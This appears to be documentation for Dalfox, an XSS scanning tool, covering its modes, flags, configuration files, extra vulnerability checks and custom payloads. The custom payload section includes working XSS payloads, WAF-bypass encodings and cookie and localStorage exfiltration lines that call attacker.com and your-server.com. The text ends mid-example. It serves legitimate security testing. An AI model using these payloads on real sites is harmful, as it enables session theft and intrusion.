- [Official Dalfox GitHub Repository](https://github.com/hahwul/dalfox)
- [Dalfox Documentation](https://dalfox.hahwul.com)
- [Dalfox Community Discussions](https://github.com/hahwul/dalfox/discussions)
- [Issue Tracker](https://github.com/hahwul/dalfox/issues)

---


## URL Mode

# URL Mode

`url` mode is the mode for detecting XSS for a single URL.

```shell
dalfox url {TARGET-URL}
```

e.g
```shell
dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff
```

---


## Usage

# Usage

Dalfox provides a powerful command-line interface with various modes and options to tailor your XSS scanning experience. The basic command structure is:

```shell
dalfox [mode] [target] [flags]
```

## Quick Start Examples

Here are some common usage examples to get you started:

```bash
# Scan a single URL
dalfox url https://example.com

# Scan a URL with parameters
dalfox url "https://example.com/search?q=test"

# Use blind XSS payload with callback URL
dalfox url https://example.com -b https://your-callback-url.com

# Scan multiple URLs from a file
dalfox file targets.txt

# Process URLs from another tool via pipeline
cat urls.txt | dalfox pipe

# Start Dalfox as a REST API server
dalfox server --host 0.0.0.0 --port 8080
```

## Available Modes

Dalfox supports several operational modes to accommodate different scanning scenarios:

| Mode | Description |
|------|-------------|
| `url` | Scan a single target URL |
| `file` | Process target URLs or raw HTTP data from a file |
| `pipe` | Read target URLs from standard input (pipeline) |
| `sxss` | Test for stored XSS vulnerabilities |
| `server` | Run as a REST API server |
| `payload` | Generate and manipulate XSS payloads |
| `version` | Display the Dalfox version |
| `help` | Show help information |

For detailed documentation on each mode, see the corresponding pages:
* [URL Mode](page/modes/url-mode/)
* [File Mode](page/modes/file-mode/)
* [Pipe Mode](page/modes/pipe-mode/)
* [SXSS Mode](page/modes/sxss-mode/)
* [Server Mode](page/modes/server-mode/)
* [Payload Mode](page/modes/payload-mode/)

## Global Flags

These flags can be used with any mode to customize your scan:

### Basic Options

```
  -b, --blind string                  Specify a blind XSS callback URL. Example: -b 'https://your-callback-url.com'
      --config string                 Load configuration from a file. Example: --config 'config.json'
  -o, --output string                 Write output to a file. Example: -o 'output.txt'
      --format string                 Set the output format. Supported: plain, json, jsonl. Example: --format 'json' (default "plain")
      --report                        Show detailed report. Example: --report
      --report-format string          Set the format of the report. Supported: plain, json. Example: --report-format 'json' (default "plain")
  -S, --silence                       Only print PoC code and progress. Example: -S
      --no-color                      Disable colorized output. Example: --no-color
      --no-spinner                    Disable spinner animation. Example: --no-spinner
      --debug                         Enable debug mode and save all logs. Example: --debug
```

### HTTP Request Configuration

```
  -X, --method string                 Override the HTTP method. Example: -X 'PUT' (default "GET")
  -d, --data string                   Use POST method and add body data. Example: -d 'username=admin&password=admin'
  -H, --header strings                Add custom headers to the request. Example: -H 'Authorization: Bearer <token>'
  -C, --cookie string                 Add custom cookies to the request. Example: -C 'sessionid=abc123'
      --cookie-from-raw string        Load cookies from a raw HTTP request file. Example: --cookie-from-raw 'request.txt'
      --user-agent string             Set a custom User-Agent header. Example: --user-agent 'Mozilla/5.0'
  -F, --follow-redirects              Follow HTTP redirects. Example: -F
      --proxy string                  Send all requests through a proxy server. Example: --proxy 'http://127.0.0.1:8080'
      --timeout int                   Set the request timeout in seconds. Example: --timeout 10 (default 10)
```

### Scanning Control

```
  -p, --param strings                 Specify parameters to test. Example: -p 'username' -p 'password'
      --ignore-param strings          Ignore specific parameters during scanning. Example: --ignore-param 'api_token' 
      --ignore-return string          Ignore specific HTTP return codes. Example: --ignore-return '302,403,404'
  -w, --worker int                    Set the number of concurrent workers. Example: -w 100 (default 100)
      --delay int                     Set the delay between requests in milliseconds. Example: --delay 1000
      --max-cpu int                   Set the maximum number of CPUs to use. Example: --max-cpu 1 (default 1)
      --waf-evasion                   Enable WAF evasion by adjusting speed when detecting WAF. Example: --waf-evasion
```

### Feature Selection

```
      --custom-payload string         Load custom payloads from a file. Example: --custom-payload 'payloads.txt'
      --only-custom-payload           Only test custom payloads. Example: --only-custom-payload
      --remote-payloads string        Use remote payloads for XSS testing. Example: --remote-payloads 'portswigger,payloadbox'
      --remote-wordlists string       Use remote wordlists for parameter mining. Example: --remote-wordlists 'burp'
      --custom-alert-type string      Set a custom alert type. Example: --custom-alert-type 'str,none' (default "none")
      --custom-alert-value string     Set a custom alert value. Example: --custom-alert-value 'document.cookie' (default "1")
      --deep-domxss                   Enable deep DOM XSS testing with more payloads (slow). Example: --deep-domxss
      --force-headless-verification   Force headless browser-based verification. Example: --force-headless-verification
      --use-bav                       Enable Basic Another Vulnerability (BAV) analysis. Example: --use-bav
      --grep string                   Use a custom grepping file. Example: --grep './samples/sample_grep.json'
      --har-file-path string          Save HAR files of scan requests. Example: --har-file-path 'scan.har'
      --found-action string           Execute a command when a vulnerability is found. Example: --found-action './notify.sh'
      --found-action-shell string     Shell to use for found action. Example: --found-action-shell 'bash' (default "bash")
```

### Discovery Control

```
      --only-discovery                Only perform parameter analysis, skip XSS scanning. Example: --only-discovery
      --skip-discovery                Skip discovery phase, proceed to XSS scanning. Example: --skip-discovery -p 'username'
      --skip-bav                      Skip Basic Another Vulnerability analysis. Example: --skip-bav
      --skip-grepping                 Skip built-in grepping. Example: --skip-grepping
      --skip-headless                 Skip headless browser-based scanning. Example: --skip-headless
      --skip-mining-all               Skip all parameter mining. Example: --skip-mining-all
      --skip-mining-dict              Skip dictionary-based parameter mining. Example: --skip-mining-dict
      --skip-mining-dom               Skip DOM-based parameter mining. Example: --skip-mining-dom
      --skip-xss-scanning             Skip XSS scanning. Example: --skip-xss-scanning
      --mining-dict                   Enable dictionary-based parameter mining. Example: --mining-dict (default true)
      --mining-dom                    Enable DOM-based parameter mining. Example: --mining-dom (default true)
  -W, --mining-dict-word string       Specify a custom wordlist file for parameter mining. Example: -W 'wordlist.txt'
```

### Output Control

```
      --only-poc string               Show only specific PoC code types. Example: --only-poc 'g,v'
                                      Supported types: g (grep), r (reflected), v (verified)
      --poc-type string               Select PoC format. Example: --poc-type 'curl' (default "plain")
                                      Supported formats: plain, curl, httpie, http-request
      --output-all                    Enable all log write mode. Example: --output-all
      --output-request                Include raw HTTP requests in results. Example: --output-request
      --output-response               Include raw HTTP responses in results. Example: --output-response
```

## Mode-Specific Flags

Different modes have specific flags to customize their behavior. Here's a summary:

### Server Mode Flags
```
      --host string   Bind address (default "0.0.0.0")
      --port int      Bind Port (default 6664)
```

### Pipe/File Mode Flags
```
      --limit int         Limit number of results to display. Example: --limit 10
      --mass              Enable parallel scanning in N*Host mode. Example: --mass
      --mass-worker int   Set number of parallel workers. Example: --mass-worker 10 (default 10)
      --multicast         Enable parallel scanning (synonym for --mass). Example: --multicast
      --silence-force     Only print PoC code, suppress progress output. Example: --silence-force
```

### File-specific Flags
```
      --har               [FORMAT] Use HAR format. Example: --har
      --http              Force HTTP on raw data mode. Example: --http
      --rawdata           [FORMAT] Use raw data from Burp/ZAP. Example: --rawdata
```

### SXSS Mode Flags
```
      --request-method string   HTTP method to send to server. Example: --request-method 'POST' (default "GET")
      --sequence int            Initial sequence number for trigger URL. Example: --sequence 3 (default -1)
      --trigger string          URL to check after injecting SXSS code. Example: --trigger 'https://example.com/profile'
```

### Payload Mode Flags
```
      --encoder-url            Encode output as URL. Example: --encoder-url
      --entity-event-handler   Enumerate event handlers. Example: --entity-event-handler
      --entity-gf              Enumerate parameters from GF-Patterns. Example: --entity-gf
      --entity-special-chars   Enumerate special characters. Example: --entity-special-chars
      --entity-useful-tags     Enumerate useful tags. Example: --entity-useful-tags
      --enum-attr              Enumerate in-attribute XSS payloads. Example: --enum-attr
      --enum-common            Enumerate common XSS payloads. Example: --enum-common
      --enum-html              Enumerate in-HTML XSS payloads. Example: --enum-html
      --enum-injs              Enumerate in-JavaScript XSS payloads. Example: --enum-injs
      --make-bulk              Generate bulk payloads for stored XSS. Example: --make-bulk
      --remote-payloadbox      Use Payloadbox's XSS payloads. Example: --remote-payloadbox
      --remote-portswigger     Use PortSwigger's XSS cheatsheet. Example: --remote-portswigger
```

---


## Configurations (advanced)

# Configuration Files

## Overview

Dalfox supports configuration files that allow you to define and reuse scan settings across multiple sessions. Using configuration files provides several advantages:

- **Consistency**: Maintain consistent scan settings across multiple targets
- **Reproducibility**: Easily reproduce scans with identical settings
- **Efficiency**: Save time by avoiding repetitive command-line parameter entry
- **Documentation**: Preserve and version control your scanning configurations
- **Sharing**: Easily share scan configurations with team members

Configuration files use JSON format and can include any option that's available via command-line flags.

### Default Configuration Directories

Dalfox will automatically look for configuration files in the following locations:

| Platform | Default Configuration Location |
|----------|--------------------------------|
| Linux/macOS | `$XDG_CONFIG_HOME/dalfox/config.json` or `$HOME/.config/dalfox/config.json` |

## Creating a Configuration File

To create a configuration file, you can start with a basic template and customize it according to your needs. 

### Basic Configuration Template

Create a file named `config.json` with this basic structure:

```json
{
  "header": [],
  "cookie": "",
  "param": [],
  "blind": "",
  "custom-payload-file": "",
  "data": "",
  "user-agent": "",
  "output": "",
  "format": "plain",
  "proxy": "",
  "timeout": 10,
  "worker": 100,
  "delay": 0
}
```

### Comprehensive Configuration Example

Here's a more comprehensive configuration example that utilizes many available options:

```json
{
  "header": [
    "Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...",
    "X-Custom-Header: TestValue"
  ],
  "cookie": "sessionid=1234abcd; language=en-US",
  "param": [
    "search",
    "q",
    "id"
  ],
  "blind": "https://your-callback.xss.ht",
  "custom-payload": "/path/to/custom-payloads.txt",
  "data": "username=test&password=test",
  "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
  "output": "scan-results.json",
  "format": "json",
  "found-action": "/path/to/notify-script.sh",
  "proxy": "http://127.0.0.1:8080",
  "timeout": 15,
  "worker": 150,
  "delay": 100,
  "only-discovery": false,
  "skip-bav": false,
  "mining-dict": true,
  "mining-dom": true,
  "remote-payloads": "portswigger,payloadbox",
  "remote-wordlists": "burp",
  "deep-domxss": true,
  "follow-redirects": true,
  "waf-evasion": false,
  "report": true,
  "report-format": "json",
  "poc-type": "curl",
  "custom-alert-value": "document.domain",
  "custom-alert-type": "str",
  "ignore-return": "404,403",
  "ignore-param": ["__VIEWSTATE", "csrf_token"]
}
```

## Configuration Options

Dalfox configuration files can include a wide range of options, organized into the following categories:

### Target Configuration

| Option | Type | Description | Example |
|--------|------|-------------|---------|
| `param` | Array | Specific parameters to test | `["search", "q", "id"]` |
| `ignore-param` | Array | Parameters to ignore during scanning | `["csrf_token", "nonce"]` |
| `ignore-return` | String | HTTP status codes to ignore | `"404,403,500"` |

### HTTP Request Configuration

| Option | Type | Description | Example |
|--------|------|-------------|---------|
| `header` | Array | Custom HTTP headers | `["Authorization: Bearer token"]` |
| `cookie` | String | Cookies for requests | `"sessionid=abc123; lang=en"` |
| `data` | String | POST request data | `"username=test&password=test"` |
| `user-agent` | String | Custom User-Agent | `"Mozilla/5.0 (Windows NT 10.0...)"` |
| `method` | String | HTTP request method | `"POST"` |
| `proxy` | String | Proxy server for requests | `"http://127.0.0.1:8080"` |
| `follow-redirects` | Boolean | Whether to follow redirects | `true` |
| `timeout` | Number | Request timeout in seconds | `10` |

### Scan Configuration

| Option | Type | Description | Example |
|--------|------|-------------|---------|
| `worker` | Number | Number of concurrent workers | `100` |
| `delay` | Number | Delay between requests (ms) | `100` |
| `blind` | String | Blind XSS callback URL | `"https://callback.xss.ht"` |
| `only-discovery` | Boolean | Only perform parameter discovery | `false` |
| `skip-bav` | Boolean | Skip BAV checks | `false` |
| `skip-mining-all` | Boolean | Skip all parameter mining | `false` |
| `mining-dict` | Boolean | Enable dictionary mining | `true` |
| `mining-dom` | Boolean | Enable DOM mining | `true` |
| `deep-domxss` | Boolean | Enable deep DOM XSS checks | `false` |
| `waf-evasion` | Boolean | Enable WAF evasion techniques | `true` |

### Payload Configuration

| Option | Type | Description | Example |
|--------|------|-------------|---------|
| `custom-payload` | String | Path to custom payload file | `"./payloads.txt"` |
| `remote-payloads` | String | Remote payload sources | `"portswigger,payloadbox"` |
| `remote-wordlists` | String | Remote wordlist sources | `"burp,assetnote"` |
| `custom-alert-type` | String | Custom alert type | `"str"` |
| `custom-alert-value` | String | Custom alert value | `"document.domain"` |
| `only-custom-payload` | Boolean | Only use custom payloads | `false` |

### Output Configuration

| Option | Type | Description | Example |
|--------|------|-------------|---------|
| `output` | String | Output file path | `"results.txt"` |
| `format` | String | Output format (plain/json) | `"json"` |
| `report` | Boolean | Generate detailed report | `true` |
| `report-format` | String | Format of the report | `"json"` |
| `output-all` | Boolean | Include all logs in output | `true` |
| `output-request` | Boolean | Include HTTP requests in output | `false` |
| `output-response` | Boolean | Include HTTP responses in output | `false` |
| `poc-type` | String | Format of PoC code | `"curl"` |
| `found-action` | String | Script to run when vulnerability found | `"./notify.sh"` |
| `found-action-shell` | String | Shell to use for found-action | `"bash"` |

## Using Configuration Files

To use a configuration file with Dalfox, use the `--config` flag followed by the path to your configuration file:

```bash
dalfox url https://example.com --config config.json
```

You can also override specific configuration file settings with command-line arguments:

```bash
dalfox url https://example.com --config config.json --worker 200 --blind https://different-callback.xss.ht
```

In this case, the `worker` and `blind` values from the command line will override those in the configuration file.

## Configuration Management Best Practices

### Maintaining Multiple Configurations

For different testing scenarios, you can maintain multiple configuration files:

- `config-quick.json`: For quick scans with minimal options
- `config-thorough.json`: For comprehensive scans with all checks enabled
- `config-ci.json`: For integration into CI/CD pipelines
- `config-waf.json`: Specifically tuned for WAF bypass testing

### Using Environment-Specific Configurations

For testing across different environments:

```bash
# Development environment
dalfox url https://dev.example.com --config config-dev.json

# Production environment
dalfox url https://www.example.com --config config-prod.json
```

### Sharing Configurations

When sharing configurations with a team:

1. Remove sensitive information (tokens, credentials)
2. Document any placeholders that need to be filled in
3. Consider using version control for configuration files
4. Provide comments or documentation on the purpose of each configuration

### Configuration Template Examples

#### Quick Scan Configuration

```json
{
  "worker": 150,
  "timeout": 5,
  "only-poc": "v",
  "format": "plain",
  "skip-bav": true,
  "skip-mining-dom": true
}
```

#### Thorough Scan Configuration

```json
{
  "worker": 50,
  "delay": 100,
  "timeout": 20,
  "remote-payloads": "portswigger,payloadbox",
  "remote-wordlists": "burp,assetnote",
  "deep-domxss": true,
  "report": true,
  "report-format": "json",
  "output-all": true,
  "format": "json",
  "har-file-path": "scan.har"
}
```

#### CI/CD Pipeline Configuration

```json
{
  "worker": 100,
  "timeout": 10,
  "format": "json",
  "output": "dalfox-results.json",
  "report-format": "json",
  "report": true,
  "silence": true,
  "only-poc": "v,g"
}
```

## Debugging Configuration Issues

If you encounter issues with your configuration file:

1. Validate that your JSON syntax is correct (no trailing commas, properly closed brackets)
2. Check for proper data types (strings in quotes, numbers without quotes)
3. Ensure that array values are properly formatted with square brackets
4. Verify that file paths in your configuration are correct and accessible

You can use tools like JSONLint to validate your configuration file before using it with Dalfox.

## Reference

For a complete list of available configuration options, you can refer to the [options model](https://github.com/hahwul/dalfox/blob/main/pkg/model/options.go) in the Dalfox source code, or check the [sample configuration file](https://github.com/hahwul/dalfox/blob/main/samples/sample_config.json) provided with Dalfox.

---


## Features (advanced)

# Features

---


## Basic Another Vulnerability (BAV) (advanced)

# Basic Another Vulnerability (BAV)

## What is BAV?

BAV (Basic Another Vulnerability) is a powerful feature in Dalfox that automatically tests for additional vulnerabilities beyond XSS during scanning. While Dalfox is primarily designed for finding XSS vulnerabilities, the BAV module extends its capabilities to detect other common web security issues with minimal additional overhead.

By default, BAV is enabled in all scanning modes, providing a more comprehensive security assessment without requiring additional tools.

## Vulnerabilities Detected by BAV

The BAV module can detect several types of common web vulnerabilities:

| Vulnerability Type | Description | Detection Method |
|-------------------|-------------|------------------|
| **SQL Injection** | Detects potential SQL injection vulnerabilities by looking for database error messages in responses | Pattern matching for MySQL, PostgreSQL, MSSQL, SQLite error strings |
| **Server-Side Template Injection (SSTI)** | Identifies template injection vulnerabilities in web frameworks | Testing special template syntax and analyzing responses |
| **Open Redirect** | Discovers endpoints vulnerable to URL redirection attacks | Testing redirection parameters with malicious URLs |
| **CRLF Injection** | Finds header injection vulnerabilities | Inserting CRLF sequences and analyzing response headers |

## How BAV Works

The BAV module operates through two main mechanisms:

1. **Active Testing**: Dalfox injects special test payloads designed to trigger specific vulnerability patterns
2. **Pattern Matching**: Responses are analyzed for characteristic error messages, behavior changes, or other indicators

This integration into the main scanning process is efficient, as it:
- Reuses established connections and parameter discovery
- Minimizes additional requests
- Provides unified reporting for all discovered vulnerabilities

## Controlling BAV Behavior

### Disabling BAV

If you prefer to focus solely on XSS testing or want to reduce scanning time, you can disable BAV using the `--skip-bav` flag:

```bash
dalfox url https://example.com --skip-bav
```

### Explicitly Enabling BAV

Although BAV is enabled by default, you can explicitly enable it using the `--use-bav` flag:

```bash
dalfox url https://example.com --use-bav
```

This is useful when combined with other configuration options or when you want to be explicit about which features are active.

## Example Output

Here's an example of what you might see in the output when BAV detects vulnerabilities:

```
[*] 🦊 Starting scan of http://vulnerable-website.com/page.php?id=1
[*] Parameter analysis in progress... 🔍
[G] Found SQL Injection via built-in grepping (MySQL error)
[POC][G][BUILT-IN/dalfox-error-mysql1/GET] http://vulnerable-website.com/page.php?id=1'

[G] Found CRLF Injection vulnerability
[POC][G][CRLF/GET] http://vulnerable-website.com/page.php?id=%0D%0ASet-Cookie:+crlf=injection

[G] Found Open Redirect vulnerability
[POC][G][OPREDIRECT/GET] http://vulnerable-website.com/page.php?url=https://evil.com

[I] Found reflected parameter: id
[V] Triggered XSS Payload (found dialog in headless browser)
[POC][V][GET] http://vulnerable-website.com/page.php?id=<script>alert(1)</script>
```

Notice how Dalfox integrates BAV findings with XSS results, providing a unified view of discovered vulnerabilities.

## BAV Detection Patterns

Dalfox uses sophisticated pattern matching to identify vulnerability indicators. Some examples include:

### SQL Injection Patterns
- `SQL syntax; check the manual that corresponds to your MySQL`
- `Warning.*?mysqli?`
- `Unclosed quotation mark after the character string`
- `PostgreSQL.*ERROR`

### SSTI Patterns
- `undefined:(0x)?[a-f0-9]+`
- `jinja2\.exceptions`
- `Twig_Error_Syntax`
- `Error: Problem parsing template`

### Open Redirect Indicators
- Unexpected 3xx responses
- URL redirection to test domains

## Benefits of Using BAV

1. **Efficiency**: Get broader coverage without running multiple tools
2. **Integrated Results**: All findings appear in the same report
3. **Low Overhead**: Minimal impact on scanning speed
4. **Comprehensive Security**: Find non-XSS issues that might be missed

## Limitations

While BAV provides valuable additional security testing, it's important to understand its limitations:

- It focuses on basic pattern detection, not deep exploitation
- False positives may occur with certain error messages
- It's not a replacement for dedicated SQL injection or SSTI scanners
- Advanced vulnerabilities requiring complex exploitation are not covered

For critical applications, consider supplementing Dalfox with specialized tools for each vulnerability type.

## Adding Custom BAV Patterns

Advanced users can contribute to the BAV module by adding new detection patterns. To learn how, see the [CONTRIBUTING.md](https://github.com/hahwul/dalfox/blob/main/CONTRIBUTING.md) file in the Dalfox repository.

---


## Command Line Flags (advanced)

# Command Line Flags

This page provides a comprehensive overview of Dalfox's command line flags, organized by functionality.

## Request Configuration Flags

These flags allow you to customize the HTTP requests sent by Dalfox:

| Flag | Description |
|------|-------------|
| `-b, --blind string` | Specify a blind XSS callback URL.<br>Example: `-b 'https://your-callback-url.com'` |
| `-C, --cookie string` | Add custom cookies to the request.<br>Example: `-C 'sessionid=abc123'` |
| `--cookie-from-raw string` | Load cookies from a raw HTTP request file.<br>Example: `--cookie-from-raw 'request.txt'` |
| `-d, --data string` | Use POST method and add body data.<br>Example: `-d 'username=admin&password=admin'` |
| `-F, --follow-redirects` | Follow HTTP redirects.<br>Example: `-F` |
| `-H, --header strings` | Add custom headers to the request.<br>Example: `-H 'Authorization: Bearer <token>'` |
| `-X, --method string` | Override the HTTP method (default: GET).<br>Example: `-X 'PUT'` |
| `--proxy string` | Send all requests through a proxy server.<br>Example: `--proxy 'http://127.0.0.1:8080'` |
| `--timeout int` | Set the request timeout in seconds (default: 10).<br>Example: `--timeout 10` |
| `--user-agent string` | Set a custom User-Agent header.<br>Example: `--user-agent 'Mozilla/5.0'` |

## Scanning Configuration Flags

These flags control the behavior of the scanning process:

| Flag | Description |
|------|-------------|
| `--config string` | Load configuration from a file.<br>Example: `--config 'config.json'` |
| `--custom-alert-type string` | Set a custom alert type (default: "none").<br>Example: `--custom-alert-type 'str,none'` |
| `--custom-alert-value string` | Set a custom alert value (default: "1").<br>Example: `--custom-alert-value 'document.cookie'` |
| `--custom-payload string` | Load custom payloads from a file.<br>Example: `--custom-payload 'payloads.txt'` |
| `--deep-domxss` | Enable deep DOM XSS testing with more payloads (slow).<br>Example: `--deep-domxss` |
| `--delay int` | Set the delay between requests to the same host in milliseconds.<br>Example: `--delay 1000` |
| `--force-headless-verification` | Force headless browser-based verification, useful when automatic detection fails.<br>Example: `--force-headless-verification` |
| `--ignore-param strings` | Ignore specific parameters during scanning.<br>Example: `--ignore-param 'api_token' --ignore-param 'csrf_token'` |
| `--ignore-return string` | Ignore specific HTTP return codes.<br>Example: `--ignore-return '302,403,404'` |
| `-p, --param strings` | Specify parameters to test.<br>Example: `-p 'username' -p 'password'` |
| `--remote-payloads string` | Use remote payloads for XSS testing. Supported: portswigger, payloadbox.<br>Example: `--remote-payloads 'portswigger,payloadbox'` |
| `--waf-evasion` | Enable WAF evasion by adjusting speed when detecting WAF (worker=1, delay=3s).<br>Example: `--waf-evasion` |

## Performance Flags

These flags allow you to fine-tune the performance of Dalfox:

| Flag | Description |
|------|-------------|
| `--max-cpu int` | Set the maximum number of CPUs to use (default: 1).<br>Example: `--max-cpu 1` |
| `-w, --worker int` | Set the number of concurrent workers (default: 100).<br>Example: `-w 100` |

## Parameter Mining Flags

These flags control how Dalfox discovers and tests parameters:

| Flag | Description |
|------|-------------|
| `--mining-dict` | Enable dictionary-based parameter mining (default: true).<br>Example: `--mining-dict` |
| `-W, --mining-dict-word string` | Specify a custom wordlist file for parameter mining.<br>Example: `-W 'wordlist.txt'` |
| `--mining-dom` | Enable DOM-based parameter mining (default: true).<br>Example: `--mining-dom` |
| `--remote-wordlists string` | Use remote wordlists for parameter mining. Supported: burp, assetnote.<br>Example: `--remote-wordlists 'burp'` |
| `--skip-mining-all` | Skip all parameter mining.<br>Example: `--skip-mining-all` |
| `--skip-mining-dict` | Skip dictionary-based parameter mining.<br>Example: `--skip-mining-dict` |
| `--skip-mining-dom` | Skip DOM-based parameter mining.<br>Example: `--skip-mining-dom` |

## Control Flow Flags

These flags allow you to control the scanning flow:

| Flag | Description |
|------|-------------|
| `--only-custom-payload` | Only test custom payloads.<br>Example: `--only-custom-payload` |
| `--only-discovery` | Only perform parameter analysis, skip XSS scanning.<br>Example: `--only-discovery` |
| `--skip-bav` | Skip Basic Another Vulnerability (BAV) analysis.<br>Example: `--skip-bav` |
| `--skip-discovery` | Skip the entire discovery phase, proceeding directly to XSS scanning. Requires -p flag.<br>Example: `--skip-discovery -p 'username'` |
| `--skip-grepping` | Skip built-in grepping.<br>Example: `--skip-grepping` |
| `--skip-headless` | Skip headless browser-based scanning (DOM XSS and inJS verification).<br>Example: `--skip-headless` |
| `--skip-xss-scanning` | Skip XSS scanning.<br>Example: `--skip-xss-scanning` |
| `--use-bav` | Enable Basic Another Vulnerability (BAV) analysis.<br>Example: `--use-bav` |

## Output and Reporting Flags

These flags control how Dalfox presents its findings:

| Flag | Description |
|------|-------------|
| `--debug` | Enable debug mode and save all logs.<br>Example: `--debug` |
| `--format string` | Set the output format. Supported: plain, json, jsonl (default: plain).<br>Example: `--format 'json'` |
| `--found-action string` | Execute a command when a vulnerability is found.<br>Example: `--found-action './notify.sh'` |
| `--found-action-shell string` | Specify the shell to use for the found action (default: bash).<br>Example: `--found-action-shell 'bash'` |
| `--grep string` | Use a custom grepping file.<br>Example: `--grep './samples/sample_grep.json'` |
| `--har-file-path string` | Specify the path to save HAR files of scan requests.<br>Example: `--har-file-path 'scan.har'` |
| `--no-color` | Disable colorized output.<br>Example: `--no-color` |
| `--no-spinner` | Disable spinner animation.<br>Example: `--no-spinner` |
| `--only-poc string` | Show only the PoC code for the specified pattern. Supported: g (grep), r (reflected), v (verified).<br>Example: `--only-poc 'g,v'` |
| `-o, --output string` | Write output to a file.<br>Example: `-o 'output.txt'` |
| `--output-all` | Enable all log write mode (output to file or stdout).<br>Example: `--output-all` |
| `--output-request` | Include raw HTTP requests in the results.<br>Example: `--output-request` |
| `--output-response` | Include raw HTTP responses in the results.<br>Example: `--output-response` |
| `--poc-type string` | Select the PoC type. Supported: plain, curl, httpie, http-request (default: plain).<br>Example: `--poc-type 'curl'` |
| `--report` | Show detailed report.<br>Example: `--report` |
| `--report-format string` | Set the format of the report. Supported: plain, json (default: plain).<br>Example: `--report-format 'json'` |
| `-S, --silence` | Only print PoC code and progress.<br>Example: `-S` |

## Usage Examples

Basic scanning with custom headers and cookies:
```bash
dalfox url https://example.com -H 'Authorization: Bearer token' -C 'session=abc123'
```

Using POST method with data:
```bash
dalfox url https://example.com/login -d 'username=admin&password=admin'
```

Output results to a JSON file with detailed reporting:
```bash
dalfox url https://example.com --format json -o results.json --report --report-format json
```

Parameter mining with custom wordlist and increased workers:
```bash
dalfox url https://example.com -W wordlist.txt -w 200
```

Using blind XSS detection with a callback URL:
```bash
dalfox url https://example.com -b https://your-xss-catcher.com/hook
```

WAF evasion with custom payloads:
```bash
dalfox url https://example.com --waf-evasion --custom-payload payloads.txt
```

Using a proxy and following redirects:
```bash
dalfox url https://example.com --proxy http://127.0.0.1:8080 -F
```

Executing a notification script when vulnerabilities are found:
```bash
dalfox url https://example.com --found-action './notify.sh'
```

Saving HAR files for further analysis:
```bash
dalfox url https://example.com --har-file-path scan.har
```

---


## Custom Payload/Alert (advanced)

# Custom Payload and Custom Alert

## Overview

Dalfox provides powerful options to customize both the XSS payloads used during scanning and the alert mechanisms triggered upon successful exploitation. These customization features are particularly valuable when:

- Testing against applications with specific XSS filters or WAFs
- Verifying vulnerabilities in environments where standard payloads fail
- Creating targeted proof-of-concept demonstrations
- Executing specialized JavaScript functions during XSS verification
- Evading detection by security tools that look for common XSS patterns

## Custom Payloads

The custom payload feature allows you to provide your own list of XSS payloads that Dalfox will use during testing, either alongside or instead of the built-in payloads.

### Using Custom Payload Files

Create a text file containing your custom payloads, with one payload per line:

**Example `my-payloads.txt`:**
```
<img src=x onerror=confirm(document.domain)>
<svg onload=eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))>
<script>fetch('https://attacker.com/c='+document.cookie)</script>
```

Then use the file with the `--custom-payload` flag:

```bash
dalfox url https://example.com/search?q=test --custom-payload my-payloads.txt
```

### Only Using Custom Payloads

If you want Dalfox to use only your custom payloads and skip the built-in ones, add the `--only-custom-payload` flag:

```bash
dalfox url https://example.com/search?q=test --custom-payload my-payloads.txt --only-custom-payload
```

This is particularly useful when:
- You need to test with a very specific set of payloads
- You want to reduce scanning time
- You're testing against a known framework with specific vulnerabilities

### Payload Templating

Your custom payloads can include special placeholder values that Dalfox will replace during testing:

- `{{title}}` - Replaced with "Dalfox"
- `{{version}}` - Replaced with the current Dalfox version

Example payload using placeholders:
```
<script>alert('XSS found by {{title}} v{{version}}')</script>
```

## Custom Alert Mechanisms

Dalfox allows you to customize the JavaScript function and value used for XSS proof-of-concept verification. This is controlled by two flags:

- `--custom-alert-value`: Changes what value is passed to the alert function
- `--custom-alert-type`: Controls how the value is formatted (string, numeric, etc.)

### Custom Alert Value

By default, Dalfox uses `alert(1)` for XSS verification. You can change the value inside the alert:

```bash
# Use alert(1337) instead of alert(1)
dalfox url https://example.com/search?q=test --custom-alert-value 1337

# Execute more complex JavaScript
dalfox url https://example.com/search?q=test --custom-alert-value "document.domain"
```

### Alert Types

The `--custom-alert-type` flag controls how the value is formatted:

| Type | Description | Example Result |
|------|-------------|---------------|
| `none` (default) | Use the value directly | `alert(1337)`, `alert(document.cookie)` |
| `str` | Wrap value in quotes | `alert("1337")`, `alert('document.cookie')` |
| `int` | Ensure value is treated as integer | `alert(1337)` |

You can specify multiple types to have Dalfox test with different formats:

```bash
# Test with both string and numeric formats
dalfox url https://example.com/search?q=test --custom-alert-value 1337 --custom-alert-type "str,int"
```

### Examples with Different Alert Types

#### Default (No Custom Alert)

```bash
dalfox url http://vulnerable-site.com/page?param=test
```

Generated payloads will use the default `alert(1)`:
```html
<script>alert(1)</script>
<img src=x onerror=alert(1)>
```

#### Custom Alert Value (No Type Specified)

```bash
dalfox url http://vulnerable-site.com/page?param=test --custom-alert-value document.cookie
```

Generated payloads:
```html
<script>alert(document.cookie)</script>
<img src=x onerror=alert(document.cookie)>
```

#### Custom Alert Value with String Type

```bash
dalfox url http://vulnerable-site.com/page?param=test --custom-alert-value XSS --custom-alert-type str
```

Generated payloads:
```html
<script>alert("XSS")</script>
<img src=x onerror=alert('XSS')>
```

#### Multiple Alert Types

```bash
dalfox url http://vulnerable-site.com/page?param=test --custom-alert-value 1337 --custom-alert-type str,none
```

Both formats will be tested:
```html
<script>alert("1337")</script>
<script>alert(1337)</script>
```

## Advanced Use Cases

### WAF Bypass Example

Create a custom payload file with WAF evasion techniques:

**waf-bypass.txt:**
```
<img src=x onerror=\u0061\u006C\u0065\u0072\u0074(1)>
<iframe src="javascript:&#97&#108&#101&#114&#116(1)"></iframe>
<script>eval('\u0061\u006c\u0065\u0072\u0074(1)')</script>
```

Run the scan with these payloads:
```bash
dalfox url https://waf-protected-site.com/search --custom-payload waf-bypass.txt
```

### Data Exfiltration Example

Create payloads that send data to your server:

**exfiltration.txt:**
```
<img src=x onerror="fetch('https://your-server.com/log?cookie='+document.cookie)">
<script>navigator.sendBeacon('https://your-server.com/log', JSON.stringify(localStorage))</script>
<svg onload="(new Image).src='https://your-server.com/log?'+document.cookie">
```

Run with your exfiltration payloads:
```bash
